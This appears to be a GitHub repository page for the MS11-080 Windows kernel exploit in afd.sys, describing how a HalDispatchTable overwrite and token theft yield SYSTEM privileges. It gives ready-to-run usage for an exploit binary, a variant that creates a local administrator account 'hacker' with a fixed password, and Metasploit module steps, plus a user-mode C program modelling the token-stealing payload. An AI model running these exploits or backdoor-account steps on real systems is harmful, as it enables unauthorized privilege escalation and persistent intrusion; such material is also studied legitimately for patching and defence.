Latest commit d3f2cdd · Jun 15, 2017
This branch is 117 commits behind SecWiki/windows-kernel-exploits:master.
MS11-080

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver (the Ancillary Function Driver, the kernel side of Winsock) to write attacker-controlled data into kernel space. The write is used to overwrite an entry in the HalDispatchTable; a subsequent call to NtQueryIntervalProfile, which dispatches through that table, executes the shellcode with kernel privileges. The shellcode elevates the exploit process to SYSTEM by borrowing the System process's token; the module then injects the payload into another SYSTEM process before restoring its own token, so the exploit process does not exit holding a token it never owned (which would destabilize the system).
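As an added illustration (not code from the SecWiki repository or from the Metasploit module), the following C program models in user mode the two things the description above says the payload does once it runs in kernel context: walk the process list to borrow the System process's token, then put the original token back. The struct layout, PIDs, token values and base addresses are constructed stand-ins, not real EPROCESS offsets or kernel addresses; the program touches no kernel state and runs on any C99 compiler.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Simplified stand-in for the three EPROCESS fields the payload touches. */
struct eprocess {
    uint32_t         pid;    /* EPROCESS.UniqueProcessId */
    uintptr_t        token;  /* EPROCESS.Token, an EX_FAST_REF: low 3 bits hold a refcount */
    struct eprocess *next;   /* ActiveProcessLinks.Flink, modelled here as a plain ring */
};

#define SYSTEM_PID    4u
#define FAST_REF_MASK ((uintptr_t)7)

/* Walk the ActiveProcessLinks ring from `self` until the System process (PID 4). */
static struct eprocess *find_system(struct eprocess *self)
{
    struct eprocess *p = self;
    do {
        if (p->pid == SYSTEM_PID)
            return p;
        p = p->next;
    } while (p != self);
    return NULL;
}

/* Elevate: copy System's token pointer (refcount bits cleared) into our EPROCESS.
 * Returns the original Token value so it can be put back; 0 if PID 4 was not found. */
uintptr_t steal_token(struct eprocess *self)
{
    struct eprocess *sys = find_system(self);
    if (sys == NULL)
        return 0;
    uintptr_t saved = self->token;
    self->token = sys->token & ~FAST_REF_MASK;
    return saved;
}

/* Restore: put the original token back. Skipping this leaves the process holding a
 * token reference the kernel never counted for it; the module restores it precisely
 * to avoid the instability that follows when the process exits. */
void restore_token(struct eprocess *self, uintptr_t saved)
{
    self->token = saved;
}

/* Kernel address of an exported symbol such as HalDispatchTable: the offset of the
 * symbol inside a user-mode mapping of the kernel image is applied to the real kernel
 * base (constructed values here; a real exploit reads the base from the loaded-module
 * list). The module's target is the entry at HalDispatchTable+4. */
uintptr_t kernel_symbol(uintptr_t kernel_base, uintptr_t user_base, uintptr_t user_sym)
{
    return kernel_base + (user_sym - user_base);
}

/* Run the sequence on a constructed three-entry process ring; returns 0 on success
 * and a distinct non-zero code for the step that failed. */
int run_model(void)
{
    struct eprocess system_p, services, self;
    system_p = (struct eprocess){ SYSTEM_PID, 0xe1000000u | 1, &services }; /* constructed */
    services = (struct eprocess){ 600,        0xe1001000u | 2, &self };
    self     = (struct eprocess){ 1234,       0xe1002000u | 3, &system_p };

    uintptr_t original = self.token;
    uintptr_t saved = steal_token(&self);
    if (saved != original)                                 return 1;
    if (self.token != (system_p.token & ~FAST_REF_MASK))   return 2; /* now "SYSTEM" */
    restore_token(&self, saved);
    if (self.token != original)                            return 3;
    return 0;
}

/* Edge case: a ring without PID 4 must leave the token untouched and report failure. */
int run_model_missing_system(void)
{
    struct eprocess a, self;
    a    = (struct eprocess){ 600,  0xe1001000u | 2, &self };
    self = (struct eprocess){ 1234, 0xe1002000u | 3, &a };
    uintptr_t before = self.token;
    if (steal_token(&self) != 0)
        return 0; /* should not have found a System process */
    return self.token == before ? 1 : 0;
}

int main(void)
{
    int rc = run_model();
    printf("token steal/restore model: %s (rc=%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    printf("HalDispatchTable+4 for constructed bases: 0x%lx\n",
           (unsigned long)(kernel_symbol(0x80400000u, 0x10000000u, 0x10041234u) + 4));
    return rc;
}
```

The save-then-restore order is the point: the real payload does the same on the live EPROCESS, and the restore is what lets the exploit process exit cleanly after the elevated payload has been handed off to another SYSTEM process.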

Vulnerability reference:

Usage

The -O argument selects the target OS profile (2k3 for Windows Server 2003; the Metasploit module targets 32-bit Windows XP SP3 and Windows Server 2003 SP2). The AddUser variant runs the same exploit and then creates a local administrator account:

  • c:\> ms11-080.exe -O 2k3
  • c:\> ms11-080-AddUser.exe -O 2k3
  • [*] Adding Admin User:hacker Pass:Hacked!...

[screenshot: win2003]

[screenshot: win7]

Load the module within Metasploit (msfconsole). It is a local exploit, so it needs an existing session on the target, selected through the SESSION option:

msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
    ...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
    ...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit